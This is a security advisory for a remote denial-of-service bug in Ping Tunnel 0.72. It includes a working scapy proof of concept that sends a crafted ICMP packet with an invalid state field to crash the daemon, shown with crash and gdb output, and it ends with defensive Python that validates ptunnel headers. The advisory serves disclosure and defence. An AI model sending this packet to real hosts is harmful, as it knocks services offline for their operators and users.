Release date: 2012-07-20
Update date: 2012-07-25

Affected systems:
freecode Ping Tunnel 0.72
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54627

Ping Tunnel is a tool for reliably tunnelling TCP connections to a remote host over ICMP echo request and reply packets, commonly known as ping requests and replies.

ptunnel 0.72 and other versions contain a remote denial-of-service vulnerability in their implementation; an attacker can exploit it to crash the affected application.

<*Source: st3n
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!

st3n () provided the following test method:
#===============================================================================
# PoC code (scapy)
#===============================================================================
import sys
from scapy.all import *

conf.verbose = 0

# arg ?
if len(sys.argv) < 2:
    sys.exit("Usage: %s <host>" % sys.argv[0])

# target
remote_host = sys.argv[1]

# ptunnel.h
#typedef struct {
#    uint32_t magic,     // magic number, used to identify ptunnel packets.
#             dst_ip,    // destination IP and port (used by proxy to figure
#             dst_port,  // out where to tunnel to)
#             state,     // current connection state; see constants above.
#             ack,       // sequence number of last packet received from other end
#             data_len;  // length of data buffer
#    uint16_t seq_no,    // sequence number of this packet
#             id_no;     // id number, used to separate different tunnels from each other
#    char     data[0];   // optional data buffer
#} __attribute__ ((packed)) ping_tunnel_pkt_t;

# build packet (header fields are byte strings in network byte order)
magic = b"\xd5\x20\x08\x80"
dst_ip = b"AAAA"
dst_port = b"BBBB"
state = b"CCCC"  # <===== this triggers the vulnerability
ack = b"\x00\x00\xff\xff"
data_len = b"\x00\x00\x00\x00"
seq_id = b"DDDD"  # seq_no and id_no, two uint16 fields
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)

# evil evil packet
send(pkt)

#=========================================================================
# Example & Info
#=========================================================================

# Sending evil packet
# -------------------
# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.

# Daemon side
# -----------
# $ ptunnel -c lo
# [inf]: Starting ptunnel v 0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault

# Debug info
# -----------
# Program received signal SIGSEGV, Segmentation fault.
# handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbffff65c, icmp_sock=7) at ptunnel.c:957
# 957 pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
# (gdb)
# (gdb) i r
# eax            0x3434343   54739779
# ecx            0x0         0
# edx            0x3434343   54739779
# ebx            0x8050184   134545796
# esp            0xbffff380  0xbffff380
# ebp            0xbffff468  0xbffff468
# esi            0xffff      65535
# edi            0xbffff5c8  -1073744440
# eip            0x804cdfa   0x804cdfa <handle_packet+494>
# eflags         0x10202     [ IF RF ]
# cs             0x73        115
# ss             0x7b        123
# ds             0x7b        123
# es             0x7b        123
# fs             0x0         0
# gs             0x33        51
# eof

Recommendation:
--------------------------------------------------------------------------------
Vendor patch: freecode
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://freecode.com/projects/
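The gdb output above shows the daemon faulting in the pt_log call that prints the packet type, so the state word taken from the wire is consumed before any range check. As an added example (not code from the advisory or from ptunnel itself), the following Python parses a ptunnel header from an ICMP echo payload using the struct layout quoted in the PoC and applies the checks the daemon lacks; the same validation can be run over captured pings by a packet-inspection tool. The state names, the two direction-flag bits and the resulting mask are assumptions taken from ptunnel.h and are not given on this page.

```python
import struct

# Header layout from the ptunnel.h excerpt in the PoC above: six packed
# uint32 fields then two uint16 fields, all sent in network byte order.
PTUNNEL_HDR = struct.Struct("!IIIIIIHH")
PTUNNEL_MAGIC = 0xD5200880  # the magic bytes the PoC sends

# Assumptions from ptunnel.h (not stated on this page): four connection
# states, and the two top bits of the state word are direction flags.
STATE_NAMES = ("start", "ack", "close", "data")
USER_FLAG = 1 << 30
PROXY_FLAG = 1 << 31
FLAG_MASK = USER_FLAG | PROXY_FLAG

# Constructed copy of the PoC payload (ICMP echo data, no IP/ICMP header).
POC_PAYLOAD = (b"\xd5\x20\x08\x80" + b"AAAA" + b"BBBB" + b"CCCC"
               + b"\x00\x00\xff\xff" + b"\x00\x00\x00\x00" + b"DDDD")


def parse_ptunnel_header(payload):
    """Return the header fields as a dict, or None if the payload is too
    short or lacks the ptunnel magic (an ordinary ping)."""
    if len(payload) < PTUNNEL_HDR.size:
        return None
    fields = PTUNNEL_HDR.unpack_from(payload)
    if fields[0] != PTUNNEL_MAGIC:
        return None
    keys = ("magic", "dst_ip", "dst_port", "state", "ack", "data_len",
            "seq_no", "id_no")
    hdr = dict(zip(keys, fields))
    hdr["payload_len"] = len(payload) - PTUNNEL_HDR.size
    return hdr


def check_ptunnel_header(hdr):
    """Return the reasons to drop a parsed header; empty means it passes.

    The state check is the one 0.72 omits: with the flag bits masked off,
    the PoC's "CCCC" state becomes 0x03434343 (54739779), the value seen
    in eax in the gdb dump above."""
    problems = []
    index = hdr["state"] & ~FLAG_MASK
    if index >= len(STATE_NAMES):
        problems.append("state index %d out of range" % index)
    if hdr["data_len"] > hdr["payload_len"]:
        problems.append("data_len %d exceeds %d payload bytes"
                        % (hdr["data_len"], hdr["payload_len"]))
    return problems
```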